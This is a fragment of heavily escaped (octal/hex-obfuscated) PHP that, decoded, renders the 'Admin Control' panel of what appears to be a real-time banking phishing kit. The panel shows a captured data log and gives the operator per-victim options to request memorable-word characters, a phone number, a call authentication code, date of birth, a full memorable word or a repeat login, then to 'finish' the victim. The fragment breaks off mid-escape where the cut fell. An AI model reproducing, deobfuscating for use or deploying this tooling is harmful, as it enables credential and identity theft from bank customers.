162\72\40\142\x6c\x61\x63\153\x3b\47\x3e\xa\x9\11\x9\11\x9\x9\11\74\x64\x69\166\40\x63\154\x61\163\x73\75\x27\x6d\x6f\x64\141\x6c\x2d\x68\x65\141\144\145\162\47\x20\163\x74\x79\154\x65\75\47\142\141\143\x6b\147\x72\157\x75\x6e\x64\55\x63\x6f\154\157\162\x3a\x23\63\64\64\x39\x35\105\x3b\x66\x6f\156\164\55\163\151\172\x65\x3a\x32\56\67\x72\x65\155\x3b\x74\x65\170\x74\x2d\x61\154\151\x67\156\72\x63\x65\x6e\164\145\x72\x3b\x27\76\xa\11\x9\x9\x9\11\x9\11\x9\74\150\x35\x20\x63\154\x61\163\163\x3d\47\x6d\157\x64\x61\x6c\x2d\164\x69\164\x6c\145\x27\40\x69\x64\75\x27\x65\x78\x61\155\x70\154\x65\x4d\157\144\141\x6c\114\x61\x62\x65\x6c\x27\x20\x73\x74\171\154\145\75\x27\x63\x6f\154\157\162\72\x77\150\x69\164\145\47\x3e\101\144\x6d\x69\156\40\103\157\156\164\x72\157\154\74\57\150\x35\x3e\xa\11\x9\11\x9\11\11\x9\x9\74\142\165\164\164\x6f\x6e\40\x74\x79\x70\x65\75\47\142\165\x74\x74\x6f\156\x27\40\x63\154\x61\163\x73\75\47\143\154\x6f\163\x65\47\40\157\156\x63\x6c\151\x63\x6b\x3d\47\143\154\157\x73\145\x5f\x62\x74\156\50\x29\47\x20\x61\162\x69\x61\55\x6c\141\x62\145\x6c\75\x27\103\154\x6f\x73\x65\x27\x3e\12\11\x9\x9\x9\x9\x9\x9\11\x9\x3c\x73\x70\141\x6e\x20\141\162\x69\141\x2d\x68\151\x64\x64\145\156\75\x27\164\162\x75\x65\47\40\x73\164\171\154\x65\75\47\143\x6f\x6c\157\162\x3a\x77\150\x69\164\x65\47\x3e\x26\x74\x69\155\x65\163\x3b\x3c\57\163\x70\141\x6e\x3e\12\x9\x9\x9\x9\x9\11\x9\11\x3c\x2f\x62\x75\164\x74\x6f\x6e\x3e\12\x9\11\x9\x9\x9\x9\x9\x3c\57\x64\151\166\x3e\12\x9\x9\x9\x9\x9\11\x9\74\144\x69\x76\40\x63\154\x61\163\x73\x3d\47\155\157\144\141\x6c\55\142\157\x64\x79\47\x3e\12\11\x9\11\x9\11\x9\11\x9\74\x64\151\x76\x20\143\x6c\141\x73\163\x3d\x27\146\157\x72\x6d\x2d\x67\x72\157\165\x70\x27\40\x73\x74\x79\154\x65\x3d\47\x6d\x61\x72\147\x69\x6e\x2d\142\x6f\x74\x74\157\x6d\x3a\61\x72\145\x6d\x27\76\xa\x9\11\x9\x9\11\11\11\x9\11\x3c\x62\x72\76\12\x9\x9\x9\11\x9\11\x9\11\x9\x3c\x74\x65\x78\164\141\x72\x65\x61\40\x69\x64\75\x27\x74\x65\x78\x74\x61\x72\x65\141\x6f\x70\164\x69\x6f\x6e\163\x27\40\x63\x6c\141\163\x73\75\x27\x66\x6f\162\x6d\x2d\143\157\x6e\x74\x72\x6f\154\x27\x20\144\151\x73\141\x62\154\145\x64\x3d\x27\x64\x69\163\141\x62\154\145\x64\x27\x20\162\x6f\x77\x73\x3d\47\x31\x36\47\40\x73\164\171\154\145\75\47\150\145\x69\147\x68\x74\x3a\x33\60\60\x70\170\x3b\x27\x3e{$data_log}\x3c\57\164\x65\x78\164\x61\162\x65\141\76\xa\x9\x9\x9\11\x9\x9\11\x9\x3c\x2f\x64\151\166\x3e\xa\x9\x9\11\11\x9\11\11\11\x9\12\x9\x9\x9\x9\11\11\11\11\74\x74\x61\142\154\x65\x20\x73\x74\171\154\x65\x3d\x27\x77\x69\x64\x74\150\72\40\x31\60\x30\x25\x3b\142\141\143\153\147\162\x6f\165\x6e\x64\x2d\143\157\x6c\x6f\162\x3a\x20\142\154\x61\143\x6b\73\x63\x6f\154\157\x72\x3a\40\167\x68\151\164\145\73\160\141\x64\144\x69\156\147\x3a\x20\x31\x30\x25\x3b\x27\x3e\xa\11\x9\11\11\x9\11\x9\x9\x9\74\x74\x62\157\144\171\x20\163\164\171\154\x65\75\47\154\151\x6e\145\x2d\x68\x65\151\147\x68\x74\72\61\x30\x30\45\73\47\76\12\x9\x9\11\11\11\11\x9\x9\x9\12\11\x9\11\11\11\11\x9\x9\x9\x9\74\164\x72\76\12\x9\x9\11\11\11\x9\11\11\x9\x9\x9\x3c\164\x64\76\12\11\x9\x9\11\x9\x9\x9\11\x9\11\x9\x9\x3c\144\x69\166\40\143\x6c\141\163\163\75\x27\146\157\x72\x6d\x2d\143\x68\x65\143\x6b\47\x3e\xa\x9\11\x9\11\11\11\x9\11\x9\11\x9\11\11\x3c\154\141\142\x65\x6c\40\x66\157\x72\75\x27\141\x73\153\x63\x68\x61\162\163\x72\141\144\151\157\x30{$value["\151\x64"]}\47\x20\x63\x6c\141\x73\163\x3d\x27\x66\157\x72\x6d\55\143\150\x65\143\x6b\x2d\x6c\141\142\x65\154\47\x3e\xa\x9\11\11\11\x9\x9\11\11\11\x9\x9\11\11\11\74\151\x6e\160\x75\x74\x20\x74\171\x70\x65\x3d\47\x72\141\x64\x69\x6f\47\x20\x6e\141\x6d\145\75\x27\163\x74\x61\164\165\x73\x27\40\x76\141\154\x75\145\75\47\x31\x31\x27\40\x69\x64\75\x27\x61\163\153\x63\x68\x61\162\x73\162\141\144\151\x6f\x30{$value["\151\144"]}\47\40\157\156\143\154\151\x63\153\75\47\163\150\x6f\167\x66\x69\x65\x6c\x64\163\x28{$value["\151\144"]}\x29\73\x27\x20\143\154\141\163\163\75\47\163\x74\141\164\x75\x73\40\x66\157\162\155\x2d\x63\x68\x65\x63\153\x2d\x69\156\x70\x75\164\x27\76\12\11\11\11\x9\11\x9\11\x9\x9\x9\x9\11\x9\11\74\x73\160\141\x6e\76\122\x65\x71\165\x65\163\x74\40\x4d\145\155\157\x72\x61\x62\154\145\x3c\x2f\x73\x70\x61\x6e\x3e\12\x9\11\11\x9\x9\x9\x9\x9\x9\x9\11\11\x9\x3c\x2f\154\x61\142\x65\x6c\x3e\12\x9\11\11\x9\x9\11\x9\x9\x9\11\x9\x9\x3c\x2f\144\151\166\76\12\11\x9\11\11\x9\x9\x9\11\x9\11\x9\x9\x3c\x21\55\55\x20\111\156\x70\x75\164\x20\143\x68\x61\x72\141\143\x74\x65\162\x73\40\55\55\x3e\12\11\x9\11\x9\x9\x9\11\11\x9\11\11\11\74\x64\151\166\x20\143\x6c\141\x73\x73\x3d\47\146\x6f\x72\x6d\55\x67\162\x6f\x75\x70\47\40\x73\164\171\x6c\x65\75\47\144\151\x73\x70\154\x61\171\x3a\156\157\156\145\x3b\x27\40\x69\x64\x3d\47\x61\x73\153\x63\x68\141\162\x73\x30{$value["\x69\x64"]}\x27\76\12\x9\x9\11\x9\11\x9\x9\11\11\x9\11\11\11\74\144\x69\166\40\143\154\141\163\x73\75\x27\x72\x6f\167\47\40\163\164\171\154\x65\75\x27\155\x61\162\x67\151\x6e\55\154\145\146\164\x3a\x35\45\x3b\155\x61\x72\x67\x69\x6e\x2d\164\157\160\72\x35\x70\x78\x27\x20\x3e\xa\x9\11\x9\11\11\x9\11\11\11\11\11\x9\11\11\x3c\x64\x69\166\x20\143\154\x61\x73\163\x3d\x27\143\x6f\x6c\47\x3e\xa\x9\x9\x9\11\11\11\11\11\11\11\11\x9\x9\x9\11\x3c\x69\x6e\160\165\x74\x20\x74\x79\160\145\x3d\47\x74\x65\x78\164\x27\40\x63\154\141\x73\x73\x3d\x27\x66\157\162\x6d\x2d\x63\157\x6e\164\162\x6f\154\47\x20\x70\x6c\141\x63\145\x68\157\x6c\x64\145\x72\x3d\47\x45\x2e\x67\x20\61\163\x74\47\40\x6e\141\155\145\75\x27\x61\163\x6b\143\x68\141\x72\61\47\40\151\144\75\x27\141\163\x6b\143\x68\141\162\61\x27\x20\x73\x74\x79\x6c\x65\75\x27\x77\151\144\x74\150\72\70\60\45\x3b\142\x6f\162\x64\x65\162\55\143\157\154\x6f\162\72\43\144\66\144\x36\x65\65\x27\x3e\12\x9\11\11\x9\11\11\x9\x9\11\x9\x9\x9\x9\x9\x3c\57\144\151\x76\x3e\12\11\x9\11\11\x9\x9\x9\11\11\11\11\11\x9\x9\x3c\144\151\166\40\x63\x6c\141\x73\163\x3d\47\x63\x6f\x6c\47\76\12\11\x9\x9\11\x9\11\x9\x9\x9\x9\x9\11\x9\11\11\x3c\151\156\x70\165\x74\40\x74\x79\x70\145\75\47\x74\x65\170\164\47\40\x63\154\141\163\x73\x3d\47\x66\x6f\x72\155\55\x63\157\x6e\164\162\157\x6c\x27\40\x70\154\x61\x63\145\150\x6f\x6c\x64\145\162\75\x27\105\56\x67\x20\x33\162\x64\x27\40\156\141\x6d\145\x3d\47\x61\163\x6b\143\x68\x61\x72\62\x27\40\x69\x64\x3d\47\x61\x73\153\x63\x68\141\x72\x32\x27\x20\x73\164\x79\x6c\145\x3d\x27\x77\151\x64\x74\x68\72\x38\x30\x25\73\142\x6f\x72\144\x65\x72\55\143\157\154\x6f\162\72\43\144\66\x64\66\145\x35\47\76\xa\11\x9\11\11\x9\x9\x9\x9\11\x9\x9\x9\11\x9\x3c\57\144\151\166\76\xa\x9\11\11\x9\11\x9\11\x9\x9\11\11\11\x9\x9\74\144\x69\x76\x20\143\x6c\x61\163\x73\75\x27\x63\157\x6c\47\x3e\xa\11\x9\x9\x9\x9\11\x9\11\x9\11\11\x9\11\x9\x9\74\x69\x6e\x70\165\164\x20\x74\171\x70\145\75\47\164\145\x78\164\47\x20\x63\154\141\x73\x73\x3d\47\x66\x6f\x72\155\55\143\157\x6e\x74\162\157\154\x27\x20\x70\x6c\x61\143\x65\x68\x6f\x6c\144\x65\x72\x3d\47\105\x2e\147\40\x36\x74\150\x27\40\x6e\x61\155\x65\75\x27\x61\x73\153\x63\x68\141\x72\x33\47\x20\151\144\75\x27\x61\163\153\x63\x68\141\162\x33\47\40\163\x74\171\x6c\145\x3d\x27\x77\x69\x64\164\150\x3a\x38\60\x25\x3b\x62\x6f\x72\144\145\x72\x2d\143\x6f\x6c\x6f\x72\72\x23\144\66\144\66\x65\x35\x27\x3e\xa\x9\x9\11\x9\11\11\11\x9\11\x9\x9\11\x9\x9\74\57\x64\151\x76\76\12\11\x9\x9\x9\x9\x9\x9\11\11\x9\11\x9\11\x3c\x2f\x64\151\166\76\xa\11\x9\x9\11\x9\x9\11\11\11\11\11\11\74\57\x64\x69\166\76\12\x9\x9\x9\x9\11\11\11\x9\11\x9\x9\x3c\57\164\x64\76\12\11\11\11\11\11\11\x9\x9\x9\x9\11\x3c\x74\144\x3e\12\11\11\x9\11\11\11\x9\x9\11\11\11\x9\74\144\x69\x76\40\143\154\141\163\x73\x3d\x27\x66\x6f\162\155\x2d\x63\x68\x65\x63\153\x27\x3e\12\11\x9\11\x9\x9\11\x9\x9\11\x9\11\x9\x9\74\154\x61\x62\145\x6c\40\x66\x6f\x72\x3d\x27\141\x73\153\143\x68\141\162\x73\x72\141\144\x69\x6f\x31{$value["\x69\144"]}\47\40\143\x6c\141\163\x73\75\47\x66\x6f\x72\155\x2d\143\150\x65\143\153\x2d\154\141\x62\145\x6c\47\76\12\x9\x9\x9\11\11\11\11\x9\x9\11\11\x9\11\11\74\151\156\x70\165\164\x20\164\171\x70\x65\x3d\x27\162\x61\144\x69\157\47\x20\156\x61\155\145\75\47\163\x74\x61\x74\165\163\x27\40\x76\x61\x6c\x75\x65\x3d\x27\61\62\47\40\x69\144\75\47\141\163\153\143\150\141\x72\x73\x72\141\144\151\x6f\x31{$value["\151\144"]}\x27\40\157\x6e\x63\154\x69\143\x6b\x3d\x27\x73\x68\x6f\167\x66\151\x65\x6c\144\x73\x28{$value["\x69\144"]}\x29\x3b\x27\40\143\x6c\141\x73\x73\x3d\47\x73\164\141\x74\x75\163\40\x66\x6f\x72\x6d\55\143\150\x65\143\x6b\55\151\x6e\x70\165\x74\47\76\xa\x9\11\x9\x9\11\11\11\11\x9\11\x9\x9\11\x9\74\163\x70\x61\x6e\x3e\122\145\x71\165\x65\163\164\x20\x74\157\x20\143\141\x6c\154\40\74\57\x73\x70\141\156\76\xa\11\x9\x9\x9\11\11\11\x9\11\11\x9\11\x9\74\x2f\154\141\142\x65\154\76\12\11\11\x9\11\x9\x9\x9\x9\11\11\11\11\x3c\57\x64\x69\166\x3e\xa\x9\11\x9\11\11\11\11\x9\11\x9\11\11\74\x21\55\x2d\x20\111\156\160\165\x74\40\x63\150\141\162\x61\143\x74\145\162\163\40\x2d\x2d\76\xa\x9\11\x9\11\x9\11\x9\x9\x9\x9\x9\11\x3c\144\x69\x76\x20\143\x6c\141\163\x73\75\47\x66\x6f\162\155\55\x67\162\x6f\165\x70\47\x20\163\164\171\154\x65\x3d\47\x64\151\x73\x70\x6c\x61\171\72\156\x6f\156\x65\x3b\47\x20\151\144\x3d\47\x61\x73\153\143\x68\141\162\x73\x31{$value["\x69\144"]}\47\x3e\12\x9\x9\x9\11\11\11\x9\11\x9\x9\11\11\x9\74\144\151\x76\40\143\154\x61\x73\x73\x3d\x27\162\157\167\x27\x20\x73\x74\x79\154\145\75\47\x6d\x61\x72\147\151\156\x2d\x6c\145\x66\164\x3a\x35\x25\x3b\x6d\x61\x72\147\x69\x6e\x2d\164\x6f\x70\x3a\65\x70\x78\47\40\x3e\12\11\x9\x9\11\x9\x9\x9\x9\11\x9\11\11\11\x9\x3c\144\151\x76\40\x63\x6c\x61\163\x73\x3d\47\143\157\154\x27\76\xa\11\11\11\11\11\11\11\x9\x9\11\11\11\x9\x9\x9\74\151\156\x70\x75\164\x20\x74\x79\160\145\x3d\47\164\145\x78\164\x27\40\143\x6c\141\x73\x73\x3d\x27\146\x6f\162\155\x2d\143\x6f\x6e\x74\162\x6f\x6c\x27\x20\160\154\x61\x63\x65\150\x6f\x6c\144\x65\x72\x3d\x27\x65\x2e\x67\x20\x30\x37\61\62\x33\x34\x38\71\63\62\x32\47\40\156\x61\x6d\145\75\47\143\141\x6c\154\156\165\155\47\x20\151\x64\75\x27\143\141\x6c\x6c\x6e\165\155\47\40\163\x74\x79\x6c\145\75\47\167\x69\x64\x74\x68\x3a\x38\x30\45\x3b\142\x6f\x72\x64\x65\162\x2d\x63\157\154\157\162\72\43\x64\x36\x64\66\145\65\x27\x3e\xa\11\x9\x9\x9\x9\11\11\11\x9\x9\11\11\x9\x9\x3c\x2f\x64\151\166\x3e\xa\11\11\x9\11\x9\x9\x9\x9\11\11\x9\x9\11\x3c\x2f\x64\x69\x76\76\xa\x9\x9\11\11\x9\x9\x9\x9\11\x9\11\11\x3c\x2f\x64\x69\x76\x3e\xa\11\x9\11\x9\11\x9\x9\x9\11\11\x9\74\x2f\x74\144\x3e\12\11\11\11\11\11\11\x9\x9\11\x9\74\57\x74\162\76\12\x9\x9\x9\11\x9\11\x9\11\11\x9\xa\11\11\x9\x9\x9\11\11\11\11\11\x3c\x74\x72\x3e\12\x9\x9\x9\11\11\11\x9\x9\x9\11\11\74\x74\x64\76\12\x9\11\11\11\x9\x9\x9\11\x9\x9\x9\11\74\x64\x69\166\x20\x63\154\x61\x73\x73\x3d\x27\146\157\162\x6d\55\143\x68\x65\x63\x6b\x27\x3e\xa\11\11\x9\x9\11\11\11\11\11\x9\x9\x9\11\x3c\154\x61\142\x65\154\40\x66\x6f\162\75\x27\x61\x73\x6b\143\150\141\x72\x73\162\141\x64\151\x6f\62{$value["\x69\x64"]}\47\x20\x63\x6c\x61\x73\x73\75\x27\146\157\x72\x6d\55\143\150\x65\x63\153\55\154\x61\142\145\154\47\76\12\x9\11\11\11\x9\x9\x9\x9\x9\11\11\x9\x9\11\74\151\156\x70\x75\x74\40\164\x79\160\x65\x3d\47\162\x61\144\151\157\47\40\156\141\x6d\x65\x3d\47\163\164\141\164\165\163\47\40\166\141\154\x75\145\75\47\x31\63\x27\40\151\x64\x3d\x27\141\x73\x6b\x63\150\x61\x72\x73\162\x61\144\151\157\62{$value["\151\x64"]}\x27\40\157\156\x63\x6c\x69\143\x6b\x3d\x27\x73\150\x6f\x77\x66\151\145\154\144\163\50{$value["\x69\144"]}\51\73\x27\40\143\x6c\x61\163\x73\75\47\163\x74\141\164\x75\x73\40\x66\x6f\x72\155\55\x63\x68\x65\143\153\x2d\151\x6e\160\165\164\x27\76\xa\x9\11\x9\11\11\11\x9\11\11\11\x9\x9\11\x9\74\x73\160\x61\x6e\76\120\x68\x6f\156\145\x20\x63\x61\154\x6c\40\x41\165\164\150\40\x3c\x2f\x73\x70\141\x6e\76\12\x9\11\11\x9\11\x9\x9\11\x9\11\11\x9\11\x3c\x2f\x6c\141\142\145\154\x3e\xa\x9\11\11\11\x9\x9\x9\x9\11\11\11\11\74\57\x64\x69\166\x3e\xa\x9\11\11\x9\x9\x9\11\x9\11\11\11\11\x3c\x21\55\55\40\x49\x6e\160\x75\x74\40\143\150\141\x72\x61\x63\x74\x65\162\x73\40\55\55\76\xa\x9\x9\11\x9\x9\11\x9\x9\x9\x9\x9\x9\x3c\x64\151\x76\40\x63\x6c\141\163\163\75\47\x66\157\162\x6d\55\x67\162\x6f\165\x70\x27\40\163\x74\171\x6c\145\x3d\47\x64\x69\x73\160\x6c\x61\x79\x3a\156\157\x6e\145\73\47\40\151\x64\x3d\x27\x61\x73\153\143\150\141\x72\x73\62{$value["\x69\x64"]}\47\x3e\12\11\x9\11\x9\x9\x9\x9\x9\x9\x9\11\x9\x9\74\x64\x69\x76\x20\143\154\141\163\x73\x3d\x27\162\157\167\47\40\163\x74\171\154\145\x3d\x27\x6d\141\x72\x67\151\x6e\55\x6c\145\146\164\x3a\x35\x25\x3b\x6d\x61\162\147\x69\x6e\x2d\164\157\x70\x3a\x35\x70\170\x27\40\76\xa\x9\11\x9\11\x9\x9\11\11\11\11\11\11\x9\11\74\144\151\166\x20\x63\154\141\163\163\75\47\x63\x6f\154\x27\76\12\11\x9\11\11\x9\11\x9\x9\11\11\x9\11\11\x9\11\74\151\156\x70\x75\x74\40\164\171\160\145\x3d\x27\164\x65\170\164\x27\x20\x63\154\x61\163\x73\x3d\47\146\157\162\155\x2d\143\157\156\164\x72\157\154\47\40\160\x6c\x61\x63\x65\x68\157\154\144\145\162\75\47\105\x6e\164\145\x72\40\143\x6f\144\145\x20\x68\145\x72\145\47\x20\156\141\155\145\x3d\x27\x63\141\x6c\154\137\143\x6f\x64\145\47\x20\x69\x64\x3d\x27\x63\x61\154\154\137\143\157\144\x65\x27\x20\x73\x74\x79\154\x65\x3d\47\167\151\144\x74\x68\x3a\70\x30\x25\x3b\x62\x6f\x72\x64\145\162\55\x63\x6f\x6c\157\x72\72\x23\144\x36\x64\x36\145\x35\x27\76\xa\11\11\x9\x9\x9\x9\x9\11\x9\x9\x9\11\x9\x9\x3c\57\x64\x69\x76\x3e\xa\x9\11\x9\11\11\x9\11\11\11\x9\x9\11\x9\x3c\x2f\144\x69\166\x3e\12\11\11\11\11\11\x9\x9\11\11\x9\11\11\74\57\144\x69\166\76\xa\11\11\11\11\11\x9\x9\x9\x9\x9\x9\74\x2f\164\144\76\12\x9\x9\x9\x9\11\11\x9\11\11\x9\x9\x3c\164\x64\76\xa\11\x9\x9\x9\11\11\x9\11\x9\11\11\x9\74\x64\151\166\x20\x63\x6c\x61\163\x73\x3d\x27\146\x6f\162\155\55\x63\150\x65\x63\153\x27\76\xa\11\11\x9\x9\11\11\11\11\11\11\11\x9\11\x3c\x6c\141\x62\145\x6c\40\146\x6f\x72\75\x27\141\163\x6b\x63\x68\x61\x72\x73\x72\x61\144\x69\157\x33{$value["\x69\x64"]}\47\x20\143\154\x61\163\163\x3d\47\146\x6f\x72\155\55\x63\150\145\143\153\55\x6c\x61\x62\x65\x6c\47\x3e\12\x9\11\x9\x9\x9\x9\11\11\x9\11\x9\x9\x9\x9\74\151\156\160\x75\164\40\164\x79\160\145\x3d\x27\162\141\x64\151\157\x27\40\156\141\155\145\75\47\163\164\x61\x74\165\163\x27\x20\166\141\154\165\x65\x3d\47\x31\64\47\40\151\144\x3d\x27\141\x73\153\x63\150\x61\162\163\x72\x61\x64\x69\157\63{$value["\x69\x64"]}\47\x20\157\156\143\154\x69\143\153\75\47\x73\150\157\167\146\x69\145\x6c\x64\163\50{$value["\x69\x64"]}\x29\73\47\x20\x63\x6c\x61\163\x73\x3d\47\163\164\141\164\x75\163\x20\146\x6f\x72\155\x2d\143\150\x65\x63\x6b\55\x69\156\160\x75\x74\47\76\xa\x9\x9\11\11\x9\11\11\x9\11\x9\x9\x9\x9\x9\x3c\x73\160\141\156\76\122\145\161\x75\x65\163\x74\40\120\150\157\x6e\x65\40\x4e\157\56\74\57\x73\160\141\x6e\x3e\12\x9\11\x9\x9\x9\x9\x9\x9\11\x9\11\x9\x9\74\x2f\154\141\142\x65\x6c\76\12\x9\x9\11\11\x9\x9\11\11\11\x9\11\11\x3c\57\x64\x69\166\x3e\xa\11\x9\11\x9\11\11\11\11\11\x9\11\74\57\x74\144\x3e\xa\11\11\x9\11\x9\11\11\11\x9\x9\74\57\164\x72\x3e\12\x9\x9\x9\x9\x9\x9\11\11\x9\x9\xa\x9\11\x9\11\11\x9\11\11\11\x9\74\x74\x72\76\12\11\11\11\11\x9\x9\11\x9\11\x9\11\x3c\x74\144\x3e\xa\11\x9\11\x9\x9\11\x9\11\11\x9\x9\11\x3c\x64\151\166\x20\x63\x6c\x61\163\163\75\47\146\157\162\x6d\55\143\150\x65\x63\x6b\x27\x3e\12\x9\11\x9\x9\x9\11\x9\11\11\11\x9\x9\x9\74\154\x61\142\145\154\x20\146\x6f\x72\75\x27\141\x73\x6b\x63\150\141\x72\163\162\x61\x64\151\x6f\64{$value["\x69\x64"]}\x27\x20\x63\154\x61\x73\163\x3d\47\x66\x6f\x72\x6d\x2d\x63\150\x65\x63\x6b\x2d\154\141\142\x65\154\47\x3e\xa\11\x9\x9\11\11\x9\x9\x9\11\11\x9\11\x9\x9\74\x69\x6e\x70\x75\x74\40\x74\x79\160\x65\75\x27\x72\x61\x64\x69\x6f\47\40\156\x61\x6d\145\x3d\x27\x73\x74\141\x74\165\x73\47\40\166\x61\x6c\x75\x65\75\47\61\65\x27\x20\x69\x64\75\x27\x61\163\x6b\143\150\141\x72\x73\x72\141\x64\151\157\64{$value["\151\144"]}\47\x20\x6f\156\x63\154\151\143\153\75\x27\x73\x68\x6f\167\x66\x69\x65\x6c\144\x73\x28{$value["\151\x64"]}\51\x3b\x27\x20\143\x6c\x61\x73\163\x3d\47\163\164\x61\164\165\163\40\146\x6f\162\155\x2d\143\x68\145\143\153\x2d\151\156\x70\x75\x74\47\76\12\11\x9\x9\x9\11\11\11\x9\x9\11\x9\11\x9\11\74\163\x70\x61\156\76\122\x65\161\x75\145\x73\164\x20\106\165\154\x6c\x20\115\x65\x6d\157\x20\74\57\163\x70\141\x6e\76\xa\11\11\x9\x9\x9\x9\11\x9\x9\x9\11\x9\11\x3c\57\x6c\x61\142\145\154\x3e\xa\x9\x9\11\x9\x9\11\11\11\11\11\x9\11\74\x2f\x64\151\166\x3e\xa\x9\11\x9\11\x9\x9\x9\11\11\x9\11\74\x2f\x74\144\x3e\xa\11\x9\11\11\x9\11\11\11\x9\11\x9\74\x74\144\76\xa\x9\11\11\11\11\11\11\x9\11\11\11\x9\74\144\151\x76\x20\x63\x6c\141\163\163\x3d\x27\x66\x6f\x72\155\x2d\x63\x68\145\x63\x6b\47\x3e\xa\11\x9\x9\11\x9\11\11\x9\x9\x9\11\x9\11\x3c\x6c\141\142\145\154\40\146\157\162\x3d\47\x61\163\153\x63\x68\x61\162\163\162\x61\x64\151\157\x35{$value["\x69\144"]}\47\40\143\154\141\163\x73\75\47\x66\157\162\x6d\x2d\x63\x68\x65\143\153\x2d\x6c\x61\x62\145\x6c\47\76\12\11\11\11\11\11\11\x9\x9\11\x9\11\x9\x9\11\x3c\x69\156\x70\x75\x74\x20\164\171\x70\145\x3d\47\162\141\144\x69\157\47\40\x6e\141\155\x65\75\x27\163\164\x61\x74\x75\163\47\40\166\141\x6c\165\145\x3d\x27\61\x36\x27\x20\x69\144\x3d\47\x61\163\153\x63\150\141\x72\x73\x72\141\144\x69\x6f\65{$value["\151\x64"]}\47\x20\x6f\x6e\143\x6c\151\143\x6b\75\47\x73\x68\157\167\146\151\145\154\x64\163\50{$value["\151\144"]}\51\73\47\40\x63\x6c\x61\x73\x73\x3d\47\163\x74\x61\164\x75\x73\40\x66\157\x72\x6d\x2d\x63\x68\x65\143\x6b\x2d\151\156\x70\165\x74\x27\x3e\12\x9\11\11\x9\x9\11\11\11\x9\11\11\x9\11\x9\x3c\163\160\x61\156\76\x52\x65\x71\165\x65\x73\x74\40\x44\117\x42\x20\x3c\57\163\160\141\x6e\76\xa\x9\11\x9\x9\x9\11\11\11\x9\11\x9\x9\x9\74\57\x6c\x61\x62\x65\x6c\76\xa\x9\x9\x9\11\x9\11\11\11\x9\11\11\11\74\57\x64\151\166\x3e\xa\x9\11\11\x9\11\11\11\11\11\11\x9\x3c\57\164\x64\76\xa\x9\x9\x9\11\11\11\x9\x9\x9\11\x3c\57\x74\162\76\12\11\11\11\x9\11\x9\x9\11\11\x9\xa\11\x9\x9\x9\x9\11\x9\11\11\x9\x3c\164\x72\76\xa\11\11\11\x9\11\11\11\11\x9\x9\11\x3c\x74\144\76\12\x9\11\x9\x9\x9\x9\11\x9\11\11\x9\x9\74\144\151\x76\x20\143\154\141\163\163\x3d\47\x66\157\162\155\55\143\150\x65\x63\153\x27\76\xa\x9\x9\11\11\x9\x9\x9\11\11\x9\11\11\x9\74\154\x61\142\145\154\x20\x66\x6f\162\75\47\x61\163\x6b\154\x6f\x67\x69\x6e\x72\x61\x64\x69\x6f{$value["\151\x64"]}\x27\40\x63\x6c\141\163\163\75\47\146\x6f\162\x6d\55\x63\150\145\x63\153\55\154\x61\x62\145\x6c\x27\x3e\xa\11\x9\11\11\x9\x9\x9\x9\x9\x9\11\11\x9\11\74\x69\x6e\160\165\164\40\164\171\x70\145\x3d\x27\162\141\x64\151\x6f\x27\40\x6e\x61\x6d\145\x3d\47\x73\x74\141\164\x75\x73\x27\x20\166\x61\154\x75\x65\75\x27\x35\60\47\x20\151\x64\75\x27\x61\163\153\x6c\x6f\147\151\156\x72\141\x64\x69\157{$value["\x69\x64"]}\47\40\157\156\143\x6c\151\x63\153\75\47\x73\150\x6f\167\146\x69\145\x6c\x64\163\50{$value["\151\x64"]}\51\73\47\40\x63\154\141\163\x73\x3d\47\163\164\141\x74\x75\163\x20\x66\x6f\x72\155\55\x63\150\145\143\153\x2d\151\x6e\x70\165\x74\x27\x3e\xa\x9\x9\11\11\11\11\11\x9\x9\x9\x9\x9\11\x9\74\163\x70\x61\156\76\122\145\161\x75\x65\x73\x74\40\x6c\x6f\147\x69\x6e\40\141\x67\141\151\x6e\x20\74\57\163\x70\141\156\x3e\xa\x9\x9\11\11\11\11\x9\11\x9\11\x9\11\x9\74\57\x6c\x61\142\x65\154\x3e\12\11\11\x9\11\x9\11\11\x9\x9\11\11\11\x3c\57\x64\x69\166\76\12\x9\11\x9\x9\x9\x9\11\11\x9\11\11\x3c\57\164\x64\x3e\xa\11\x9\x9\x9\11\x9\11\x9\11\x9\11\x3c\164\144\x3e\12\11\11\11\11\11\11\11\11\x9\11\11\11\x3c\x64\x69\x76\x20\x63\154\x61\x73\x73\75\x27\x66\x6f\162\155\55\x63\x68\145\x63\153\47\x3e\xa\11\11\x9\11\11\11\x9\11\x9\x9\11\11\11\74\x6c\x61\142\x65\154\40\x66\x6f\x72\75\x27\146\151\156\x69\x73\150\x72\141\144\x69\x6f{$value["\151\144"]}\47\40\143\154\141\x73\x73\x3d\x27\146\x6f\162\155\x2d\x63\150\145\x63\153\x2d\154\141\x62\145\x6c\x27\76\12\11\11\11\11\x9\11\11\x9\x9\x9\x9\x9\x9\11\74\151\x6e\x70\165\x74\x20\x74\x79\x70\x65\75\47\162\141\x64\x69\157\47\40\x6e\141\x6d\x65\75\47\163\164\x61\164\x75\163\x27\x20\166\x61\154\165\x65\x3d\x27\62\x30\47\x20\151\144\75\x27\146\x69\x6e\x69\x73\x68\x72\141\144\151\157{$value["\x69\x64"]}\47\40\157\156\143\154\151\x63\153\75\47\163\x68\x6f\167\146\151\x65\x6c\x64\x73\x28{$value["\151\144"]}\x29\73\x27\x20\x63\x6c\x61\163\163\75\47\163\164\x61\x74\165\163\x20\146\157\x72\155\55\x63\150\x65\143\153\x2d\x69\x6e\x70\x75\x74\47\76\12\11\11\x9\x9\11\11\x9\11\11\11\x9\11\x9\x9\x3c\163\160\141\156\76\106\151\156\151\163\x68\74\x2f\163\x70\x61\156\x3e\12\11\x9\11\11\11\11\x9\x9\11\11\x9\x9\11\74\x2f\154\141\142\145\x6c\76\12\x9\x9\11\11\11\11\x9\11\11\11\11\11\x3c\x2f\x64\151\x76\x3e\xa\11\x9\11\11\11\x9\11\11\11\x9\x9\x3c\57\x74\x64\76\12\x9\11\11\11\11\11\11\x9\11\x9\74\57\x74\162\76\xa\11\x9\x9\x9\x9\x9\x9\11\x9\x9\12\x9\x9\x9\x9\11\11\x9\11\11\11\74\164\x72\x3e\12\11\x9\11\11\11\x9\11\x9\11\11\11\x3c\x74\144\76\12\11\x9\x9\11\x9\x9\11\11\x9\x9\11\11\74\x64\151\x76\40\143\154\141\163\163\75\x27\x66\157\x72\x6d\x2d\143\150\x65\143\x6b\x27\x3e\xa\x9\x9\x9\x9\11\11\x9\11\x9\x9\x9\x9\x9\x3c\x6c\141\x62\145\x6c\40\146\157\x72\x3d\47\x73\145\156\144\141\x77\x61\x79\x72\x61\144\151\x6f{$value["\151\144"]}\x27\40\143\154\141\163\x73\x3d\x27\146\157\x72\x6d\x2d\x63\x6